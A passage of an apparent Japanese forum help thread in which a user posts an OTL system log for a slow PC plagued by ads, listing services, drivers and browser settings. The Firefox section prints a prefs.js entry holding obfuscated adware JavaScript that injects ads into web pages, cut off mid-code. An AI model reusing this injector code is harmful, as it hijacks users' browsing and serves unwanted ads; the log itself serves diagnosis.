SRV - [2011/06/07 12:07:28 | 000,047,032 | ---- | M] (TOSHIBA CORPORATION) [Auto | Running] -- C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe -- (ConfigFree Service)
SRV - [2011/06/01 12:14:48 | 000,223,184 | ---- | M] (TOSHIBA Corporation) [Auto | Running] -- C:\Program Files (x86)\TOSHIBA\TKRTL\TPCHKarteSVC.exe -- (TPCHKarteSVC)
SRV - [2010/12/20 18:30:38 | 002,656,280 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2010/12/20 18:30:36 | 000,325,656 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2010/03/11 14:06:06 | 000,193,824 | ---- | M] (Protexis Inc.) [Auto | Running] -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/04/30 20:56:15 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV:[b]64bit:[/b] - [2015/02/05 21:34:24 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2015/02/05 21:34:24 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2015/02/05 21:34:24 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/11/21 06:14:22 | 000,063,704 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mwac.sys -- (MBAMWebAccessControl)
DRV:[b]64bit:[/b] - [2014/11/21 06:14:08 | 000,025,816 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2014/07/14 15:39:46 | 000,121,944 | ---- | M] (Trend Micro Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\tmactmon.sys -- (tmactmon)
DRV:[b]64bit:[/b] - [2014/07/14 15:39:42 | 000,093,664 | ---- | M] (Trend Micro Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\tmevtmgr.sys -- (tmevtmgr)
DRV:[b]64bit:[/b] - [2014/07/14 15:39:36 | 000,305,832 | ---- | M] (Trend Micro Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\tmcomm.sys -- (tmcomm)
DRV:[b]64bit:[/b] - [2014/07/10 00:03:16 | 000,407,864 | ---- | M] (Trend Micro Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tmnciesc.sys -- (tmnciesc)
DRV:[b]64bit:[/b] - [2014/07/10 00:02:56 | 000,106,296 | ---- | M] (Trend Micro Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tmeevw.sys -- (tmeevw)
DRV:[b]64bit:[/b] - [2014/06/30 19:06:54 | 000,106,296 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\tmusa.sys -- (tmusa)
DRV:[b]64bit:[/b] - [2012/03/01 15:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2011/08/31 12:53:20 | 012,306,848 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2011/08/05 12:34:02 | 000,025,496 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2011/08/05 12:34:00 | 000,034,200 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2011/05/01 14:33:06 | 008,593,920 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NETwNs64.sys -- (NETwNs64)
DRV:[b]64bit:[/b] - [2011/03/18 15:03:18 | 000,482,384 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\tos_sps64.sys -- (tos_sps64)
DRV:[b]64bit:[/b] - [2011/03/14 09:17:26 | 000,120,928 | ---- | M] (CypherTec Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\cymon.sys -- (Cymon)
DRV:[b]64bit:[/b] - [2011/03/11 15:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/03/11 15:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2011/02/10 14:52:34 | 000,181,760 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3xhc.sys -- (nusb3xhc)
DRV:[b]64bit:[/b] - [2011/02/10 14:52:34 | 000,082,432 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3hub.sys -- (nusb3hub)
DRV:[b]64bit:[/b] - [2011/02/08 19:07:00 | 000,038,096 | ---- | M] (TOSHIBA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\PGEffect.sys -- (PGEffect)
DRV:[b]64bit:[/b] - [2011/02/03 19:59:06 | 001,413,680 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:[b]64bit:[/b] - [2011/01/27 12:34:12 | 001,577,088 | ---- | M] (Conexant Systems Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CHDRT64.sys -- (CnxtHdAudService)
DRV:[b]64bit:[/b] - [2011/01/12 17:51:44 | 000,439,320 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:[b]64bit:[/b] - [2010/12/01 16:12:06 | 000,250,984 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:[b]64bit:[/b] - [2010/11/23 14:58:02 | 000,306,792 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rtsuvstor.sys -- (RSUSBVSTOR)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2010/11/11 14:14:52 | 000,017,512 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\diskperf64.sys -- (diskperf64)
DRV:[b]64bit:[/b] - [2010/11/08 12:44:40 | 000,076,912 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C62x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2010/10/19 16:34:26 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2010/10/15 01:28:16 | 000,317,440 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/07/08 10:21:34 | 001,029,472 | ---- | M] (Ralink Technology Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ucgnmx.sys -- (ucgnm)
DRV:[b]64bit:[/b] - [2010/06/16 13:13:20 | 000,015,536 | ---- | M] (TOSHIBA Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TosRzTf.sys -- (TosRzTf)
DRV:[b]64bit:[/b] - [2010/03/05 20:19:00 | 000,011,296 | ---- | M] (Intercom, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\llhrcmi6.sys -- (llhrcmi6)
DRV:[b]64bit:[/b] - [2009/07/30 20:22:04 | 000,027,784 | ---- | M] (TOSHIBA Corporation.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tdcmdpst.sys -- (tdcmdpst)
DRV:[b]64bit:[/b] - [2009/07/14 15:31:18 | 000,026,840 | ---- | M] (TOSHIBA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\TVALZ_O.SYS -- (TVALZ)
DRV:[b]64bit:[/b] - [2009/07/14 10:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 10:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 10:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2009/06/19 19:15:22 | 000,014,472 | ---- | M] (TOSHIBA Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\TVALZFL.sys -- (TVALZFL)
DRV:[b]64bit:[/b] - [2009/06/15 13:58:50 | 000,012,800 | ---- | M] (TOSHIBA) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\QIOMem.sys -- (QIOMem)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/11 05:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2014/12/26 23:06:44 | 000,026,528 | ---- | M] (REALiX(tm)) [Kernel | System | Running] -- C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS -- (HWiNFO32)
DRV - [2011/11/08 18:23:34 | 000,082,416 | ---- | M] (Cyberlink Corp.) [Kernel | Auto | Running] -- C:\Program Files (x86)\CyberLink\RZ Player\Kernel\DMP\NTIPPKernel_64.sys -- (NTIPPKernel)
DRV - [2009/07/14 10:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{81C29D48-8D3F-4BBC-9824-E87957F028F4}: "URL" = http://search.yahoo.co.jp/search?ei=UTF-8&fr=tospccie4&p={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{81C29D48-8D3F-4BBC-9824-E87957F028F4}: "URL" = http://search.yahoo.co.jp/search?ei=UTF-8&fr=tospccie4&p={searchTerms}


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://dynabook.www.yahoo.co.jp/
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\..\SearchScopes\{F49D92B5-40EB-4AA3-9DCB-180F1E9EEDF7}: "URL" = http://www.bing.com/search?FORM=SKY2DF&PC=SKY2&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\..\SearchScopes\D9A4CA08FD7249A89ED82E59C6608457: "URL" = http://search.yahoo.co.jp/search?ei=UTF-8&fr=ypcsm&p={searchTerms}
IE - HKU\S-1-5-21-3164139845-2903138398-2106333873-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]
  • T・T
  • 2015/04/30 (Thu) 21:25:52
Re: パソコン動作緩慢・広告類がひどい
OTLのログです
FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.highlightCount: 0
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..browser.search.selectedEngine: "Yahoo! Search"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.P0D3CmBSTPzOkdLJ.scode: "(function(){try{if(window.self.location.href.indexOf(\"qHa6rHr4rdCEpjaHqda6pjC5qE\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/]];for(var i=0,a=d[0],l=a.length;i<l;i++){if(window.self.location.hostname.indexOf(a[i])>-1){return;}}for(var j=0,a=d[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.hostname)){return;}}}catch(e){}try{(function(){var stngs = {attr_name:'s7073390709034079787',szy_domain:[\"reservescoring.info\",\"theprivilegesbox.com\"],ad_sizes:[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]],checkif:function(ifr){return (ifr.getAttribute('s7073390709034079787') || ifr.src.indexOf('=13872950')>-1||ifr.src.indexOf('=13872950')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};if(\"undefined\"==typeof window.adzy653rk&&document.getElementsByTagName(\"body\").length&&!document.getElementsByTagName(\"body\")[0].getAttribute(\"jhjlijpomuhn_m\")){var removeNode=function(a){for(var b=(63,342)>(559,85)?(56,!0):(63,1401),c=(372,1)<(364,98)?(1098,!1):(971,40),d=829<(71,1335)?(1100,122):(918,478),e=12>(481,500)?267:586<(136,1243)?(339,90):(92,89),g=27<=(42,519)?(468,97):(69,283),h=137<(169,296)?(93,\"m\"):(96,984),f=136>=(37,599)?(92,301):(966,429)<=(369,537)?(213,64):(578,1008),l=307>=(1295,\n1355)?(809,\"L\"):69>=(158,391)?(669,117):141<(368,514)?(1490,6):(1113,116),n=(43,255)>=(223,250)?(468,63):(879,133),k=22>(199,868)?(1170,\"s\"):(917,799)>=(972,448)?(122,\"n\"):44>=(211,96)?(1080,71):(58,556),A=75>=(1239,49)?(21,\"9\"):27>=(501,441)?(59,48):(207,1058)<(454,90)?\";\":(122,914),K=414>=(295,137)?(109,\"8\"):(1165,557),v=874>=(78,39)?(77,\"7\"):116>(476,807)?(1499,989):(520,925),R=(953,33)>(639,132)?(434,\"z\"):149<(132,581)?(77,\"z\"):61>=(597,482)?126:(771,8),S=456<=(451,877)?(2,\"x\"):(52,18),F=326<\n(1197,1202)?(1274,\"i\"):(26,109),G=410>=(1290,732)?(485,25):52>(20,78)?1380:1102>=(49,51)?(294,\"b\"):(112,161),L=(146,387)>(818,87)?(534,\"Y\"):(1385,1004),T=52<(95,139)?(57,\"X\"):(840,124),U=123<=(105,50)?(142,\"'\"):1333>(11,318)?(108,\"T\"):(962,1482),M=(755,119)>=(49,128)?47:880<(473,103)?41:59>(183,40)?(272,\"Q\"):(125,73),V=533<(155,25)?1E3:55>(133,112)?(1416,429):(31,1188)>(72,497)?(502,\"N\"):(82,144),N=(491,93)>(39,1009)?(1047,\"aaa\"):325>=(249,9)?(83,\"M\"):(645,114),O=(91,94)>(16,53)?(484,\"K\"):(462,83)>=\n(3,103)?(114,90):146<(114,132)?\"O\":(145,53),P=259<(286,86)?209:142>=(303,8)?(189,\"D\"):88>=(24,287)?(40,191):(1406,186),W=102<=(476,402)?(132,4537426):(315,47),H=(97,23)<=(514,29)?(117,1290452675):(862,1417),B=117<(32,132)?(352,\"0\"):(78,430),r=110>(545,410)?(71,457):548>=(81,37)?(555,\"2\"):(96,999),w=82<(1007,1382)?(869,\"f\"):(86,207),D=131>=(471,71)?(208,\"s\"):(103,115),C=107>=(74,129)?(25,\"c\"):(20,532)<=(74,750)?(20,\"p\"):237>(31,498)?(446,133):(110,138),I=100<(31,83)?(54,129):(112,132)<=(75,408)?(49,\n\"U\"):(593,65),H=-H,E=s7S5.V7T,J=s7S5.j7T;-1139651341!==s7S5.E0.i0(J.toString(),J.toString().length,8698539J++)y.push(u(j)),S9(),E+=s7S5.V7T;if(s7S5.E0.i0(E.toString(),E.toString().length,W)!==H)return j2<<Y2;var Q={_keyStr:\"ABC\"+P+\"EFGHIJ\"+O+\"L\"+N+V+\"OP\"+M+\"RS\"+U+I+\"VW\"+T+L+\"Za\"+G+\"cd\"+s7S5.n7T+w+\"g\"+s7S5.s4T+F+\"jklmno\"+C+\"qrstuvw\"+S+\"y\"+R+B+\"123456\"+v+K+A+\"+/=\",encode:function(a){var b=(540,335)>=(145,38)?(1201,\"S\"):(91,1254),c=146<=(1489,582)?(1031,\"5\"):(252,74),d=(58,41)<=(298,99)?(685,\"_\"):\n(213,84)<=(44,76)?(422,31):(14,1),e=\"\",g,h,s,m,t,p,x=s7S5.Y7T;for(a=Q[d+\"ut\"+w+K+d+s7S5.n7T+k+\"code\"](a);s7S5[I+c](x,a.length);)g=a[s7S5.g7T+\"harC\"+s7S5.W9T+s7S5.r7T+s7S5.n7T+s7S5.E9T+s7S5.I7T](x++),h=a[s7S5.G7T+s7S5.j4T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),s=a[s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),m=s7S5[C+r](g,s7S5.V7T),t=111>(67,494)?107:(1207,1483)>(746,910)?(1313,\"F\"):138>=(435,222)?309:(209,1488),g=s7S5[t+c]((g&s7S5.e7T)<<s7S5.C7T,h>>s7S5.C7T),t=s7S5.A5((h&\ns7S5.K7T)<<s7S5.V7T,s>>l),p=s7S5[P+c](s,n),isNaN(h)?t=p=f:isNaN(s)&&(p=f),e=e+this[\"_keySt\"+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](m)+this[\"_key\"+b+s7S5.I7T+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](g)+this[d+\"k\"+s7S5.n7T+\"y\"+b+\"tr\"][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](t)+this[d+\"k\"+s7S5.n7T+\"y\"+b+s7S5.I7T+s7S5.A7T][s7S5.g7T+s7S5.s4T+\"arAt\"](p);return e},decode:function(a){var b=(3,44)>=(480,32)?(136,256):(731,73),c=(475,0)<=(58,543)?(121,\"u\"):(695,\n38),d=459<(262,536)?(888,72):(1044,140),e=(148,306)>=(337,136)?(202,\"H\"):(60,126),q=(283,528)<(3,97)?(261,\"aaa\"):53>(629,332)?(51,\"d\"):1229>(127,1138)?(128,44):(726,741),n=183<=(559,42)?1E4:525>=(4,82)?(35,43):(5,96),s=124>(3,67)?(195,58):(143,637)<=(104,120)?90:(22,141),m=231<(519,98)?\"j\":48<(17,1053)?(23,48):(75,139),t=(401,28)<(510,88)?(28,123):(359,105)>=(730,700)?(1021,2):(101,390),p={},x=[],v=\"\",w=String[\"fr\"+s7S5.W9T+h+s7S5.G4T+s7S5.s4T+s7S5.N7T+\"rCod\"+s7S5.n7T],n=[[65,91],[g,t],[m,s],[n,q],\n[47,m]];for(z in n)for(q=n[z][s7S5.Y7T];s7S5[e+r](q,n[z][s7S5.j7T]);q++)x[\"pu\"+D+s7S5.s4T](w(q));for(q=s7S5.Y7T;s7S5[h+r](q,f);q++)p[x[q]]=q;for(q=s7S5.Y7T;s7S5[M+r](q,a.length);q+=d)for(s=e=s7S5.Y7T,m=a[D+c+G+D+s7S5.I7T+s7S5.A7T+F+k+\"g\"](q,q+d),n=s7S5.Y7T;s7S5.P2(n,m.length);n++)for(x=p[m[s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.E9T+s7S5.I7T](n)],e=s7S5[c+r](e,l)+x,s+=l;s7S5[\"k\"+r](s,s7S5.Z7T);)v+=w(s7S5[F+r](e>>>(s-=s7S5.Z7T),b));return v},_utf8_encode:function(a){var b=70>(376,25)?(621,224):3>=(453,58)?\n(352,2048):(42,88),c=105>=(26,66)?(400,192):(574,60),d=932<(1182,101)?775:(540,121)<=(93,95)?148:(319,561)>=(155,52)?(1234,2048):(214,257),f=(65,346)<=(114,1276)?(341,\"J\"):1351<(222,576)?(576,996):(116,1245),e=(542,339)>(95,102)?(149,127):432<=(130,104)?(114,12):(1021,686),g=79>=(61,853)?(528,\"f\"):(822,133)<=(153,1191)?(276,128):(72,85),k=961>(349,346)?(232,\"B\"):(69,79)>(389,906)?(1088,\"r\"):(1284,32),m=(489,331)<(284,680)?(46,\"l\"):(84,144);a=a[s7S5.A7T+s7S5.n7T+C+m+s7S5.N7T+s7S5.g7T+s7S5.n7T](/\\r\\n/g,\n\"\\n\");for(var m=\"\",t=s7S5.Y7T;s7S5.z2(t,a.length);t++){var 